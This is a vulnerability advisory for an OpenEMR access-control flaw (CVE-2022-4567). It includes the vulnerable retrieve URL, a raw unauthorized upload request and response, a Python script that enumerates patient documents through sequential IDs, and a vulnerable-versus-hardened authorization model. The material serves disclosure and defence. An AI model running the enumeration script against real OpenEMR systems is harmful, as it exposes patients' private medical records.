OpenEMR – Broken Access Controls in Patient’s Document Section (CVE-2022-4567)
Summary
An authenticated user with no permission to access the "document" section can directly access any document in the system by manipulating the patient_id and document_id parameters in the URL. Because both identifiers are auto-increment values, they can also be brute-forced, which makes finding valid documents cheap. A second instance of the same missing check allowed unprivileged users to upload files into any patient's document repository.
Impact
Description
The first instance allows any authenticated user, regardless of document permissions, to retrieve a document by supplying its patient_id and document_id in the URL:
http://domain/openemr/controller.php?document&retrieve&patient_id=2&document_id=19
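Because the identifiers are sequential, the practical attack is to walk document_id for a given patient_id and keep whatever the server serves as a file. The script below is an added example (it is not part of the advisory and not OpenEMR code) showing that enumeration against the endpoint shape quoted above. It assumes the hostname "domain" from the advisory's URL, that a refused request renders the text "Documents Not Authorized" inside an HTTP 200 page (so status codes alone cannot distinguish a hit), and it injects the transport as a callable so the scan runs offline against the constructed fake server at the bottom; a real run would swap in an HTTP client carrying a low-privilege user's session cookie on an instance you are authorised to test.

```python
"""Enumerate patient documents via controller.php?document&retrieve (illustrative, not OpenEMR code)."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode, urlsplit

BASE = "http://domain/openemr/controller.php"   # hostname as written in the advisory URL
DENIED_MARKER = "Documents Not Authorized"       # assumed text of the refusal page

Response = Tuple[int, Dict[str, str], bytes]     # (status, headers, body)


@dataclass
class Hit:
    patient_id: int
    document_id: int
    filename: Optional[str]
    size: int


def retrieve_url(patient_id: int, document_id: int) -> str:
    """Build the URL exactly as the advisory shows it: two bare flags, then the IDs."""
    query = urlencode({"patient_id": patient_id, "document_id": document_id, "as_file": "false"})
    return f"{BASE}?document&retrieve&{query}"


def classify(status: int, headers: Dict[str, str], body: bytes) -> Optional[Tuple[str, int]]:
    """Return (filename, size) when the response is a served file, else None.

    A refusal is still HTTP 200 here, so the decision is made on the body marker
    and on the presence of a Content-Disposition filename, which the file path sets.
    """
    if status != 200 or DENIED_MARKER.encode() in body:
        return None
    disposition = headers.get("Content-Disposition", "")
    if "filename=" not in disposition:
        return None
    filename = disposition.split("filename=", 1)[1].strip().strip('"')
    return filename, len(body)


def enumerate_documents(fetch: Callable[[str], Response], patient_id: int, id_range: range) -> List[Hit]:
    """Walk document_id over id_range for one patient_id and collect every served file."""
    hits: List[Hit] = []
    for document_id in id_range:
        status, headers, body = fetch(retrieve_url(patient_id, document_id))
        found = classify(status, headers, body)
        if found is not None:
            hits.append(Hit(patient_id, document_id, found[0], found[1]))
    return hits


# ---- constructed stand-in for a vulnerable server (sample data, not real documents) ----
FAKE_DOCS = {
    (2, 19): ("labs.pdf", b"%PDF-1.4 fake"),
    (2, 23): ("testBAC.txt", b"TESTFILE"),
}


def fake_fetch(url: str) -> Response:
    """Serve any document that exists, ignoring who asks; otherwise render the refusal page as 200."""
    q = parse_qs(urlsplit(url).query)          # the bare 'document' and 'retrieve' flags are dropped
    key = (int(q["patient_id"][0]), int(q["document_id"][0]))
    if key in FAKE_DOCS:
        name, data = FAKE_DOCS[key]
        headers = {"Content-Disposition": f'inline; filename="{name}"',
                   "Content-Type": "application/octet-stream"}
        return 200, headers, data
    return 200, {"Content-Type": "text/html"}, b"<html>Documents Not Authorized</html>"


if __name__ == "__main__":
    for hit in enumerate_documents(fake_fetch, patient_id=2, id_range=range(1, 40)):
        print(hit)
```

The classifier deliberately ignores the status line: an IDOR scan that keys on 200 versus 403 would report every refusal as a hit on a server that renders its denial page with 200.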
The second instance affects the upload functionality. The following request, sent by a user without document permissions, illustrates it:
Host: REDACTED
(…snip…)
Upgrade-Insecure-Requests: 1

-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="file[]"; filename="testBAC.txt"
Content-Type: text/plain

TESTFILE
-----------------------------247482557730593022112237721191
Content-Disposition: form-data; name="dicom_folder[]"; filename=""
Content-Type: application/octet-stream

(…snip…)
-----------------------------247482557730593022112237721191--
The response displayed a "Documents Not Authorized" message, but the file had already been stored: the authorization check runs after the write, and the new document (document_id 23) could then be fetched with a direct request to the retrieve endpoint:
GET /openemr/controller.php?document&retrieve&patient_id=2&document_id=23&as_file=false HTTP/1.1
(…snip…)

RESPONSE:
HTTP/1.1 200 OK
Date: Fri, 07 Oct 2022 16:07:36 GMT
Server: Apache/2.4.54 (Debian)
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Description: File Transfer
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename="testBAC.txt"
Content-Length: 8
Connection: close
Content-Type: text/plain;charset=utf-8

TESTFILE
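Both instances come down to the same two missing checks: the caller's permission for the document section is never consulted, and document_id is never tied back to patient_id. The model below is an added example (not OpenEMR's code and not its fix) that puts the vulnerable pattern beside a hardened one for both retrieval and upload. The ACL name "patients/docs", the in-memory store and the users are constructed stand-ins; the upload side reproduces the behaviour observed above, where the vulnerable handler stores the file and only then renders the denial, whereas the hardened handler authorizes before any side effect.

```python
"""Vulnerable vs. hardened authorization for patient documents (illustrative model, not OpenEMR code)."""
from dataclasses import dataclass
from typing import Dict, Optional, Set, Tuple

DOC_ACL = "patients/docs"                     # hypothetical ACL name for the document section
DENIED = (403, "Documents Not Authorized")    # message text from the advisory; status is our choice


@dataclass
class User:
    name: str
    acl: Set[str]


@dataclass
class Document:
    patient_id: int
    filename: str
    data: bytes


class DocumentStore:
    """In-memory stand-in for the documents table plus the per-patient file repository."""

    def __init__(self) -> None:
        self.docs: Dict[int, Document] = {}
        self.next_id = 1          # auto-increment, which is what makes guessing cheap

    def add(self, patient_id: int, filename: str, data: bytes) -> int:
        doc_id = self.next_id
        self.next_id += 1
        self.docs[doc_id] = Document(patient_id, filename, data)
        return doc_id


def vulnerable_retrieve(store: DocumentStore, user: User, patient_id: int, document_id: int) -> Tuple[int, object]:
    """Pattern the advisory describes: row looked up by document_id alone, user and patient_id ignored."""
    doc = store.docs.get(document_id)
    if doc is None:
        return 404, "Not found"
    return 200, doc.data


def hardened_retrieve(store: DocumentStore, user: User, patient_id: int, document_id: int) -> Tuple[int, object]:
    """Check the section ACL, then bind the object to the patient named in the request."""
    if DOC_ACL not in user.acl:
        return DENIED
    doc = store.docs.get(document_id)
    # One answer for "no such row" and "row belongs to another patient", so the
    # sequential id cannot be used as an existence oracle by an authorized user either.
    if doc is None or doc.patient_id != patient_id:
        return 404, "Not found"
    return 200, doc.data


def vulnerable_upload(store: DocumentStore, user: User, patient_id: int,
                      filename: str, data: bytes) -> Tuple[int, str, Optional[int]]:
    """Write first, authorize second: the denial page is rendered but the file is already stored."""
    doc_id = store.add(patient_id, filename, data)
    if DOC_ACL not in user.acl:
        return DENIED[0], DENIED[1], doc_id
    return 200, "OK", doc_id


def hardened_upload(store: DocumentStore, user: User, patient_id: int,
                    filename: str, data: bytes) -> Tuple[int, str, Optional[int]]:
    """Authorize before any side effect; nothing touches the store on denial."""
    if DOC_ACL not in user.acl:
        return DENIED[0], DENIED[1], None
    doc_id = store.add(patient_id, filename, data)
    return 200, "OK", doc_id


if __name__ == "__main__":
    store = DocumentStore()
    clinician = User("clinician", {DOC_ACL})    # constructed authorized user
    lowpriv = User("lowpriv", set())            # constructed user without the document ACL
    doc19 = store.add(2, "labs.pdf", b"%PDF-1.4 fake")
    print("vulnerable:", vulnerable_retrieve(store, lowpriv, 2, doc19))
    print("hardened:  ", hardened_retrieve(store, lowpriv, 2, doc19))
    print("upload:    ", vulnerable_upload(store, lowpriv, 2, "testBAC.txt", b"TESTFILE"))
```

The patient_id comparison matters even for users who legitimately hold the document ACL: without it the section permission becomes a licence to read every patient's files, which is the coarse-versus-per-object distinction at the heart of this class of bug.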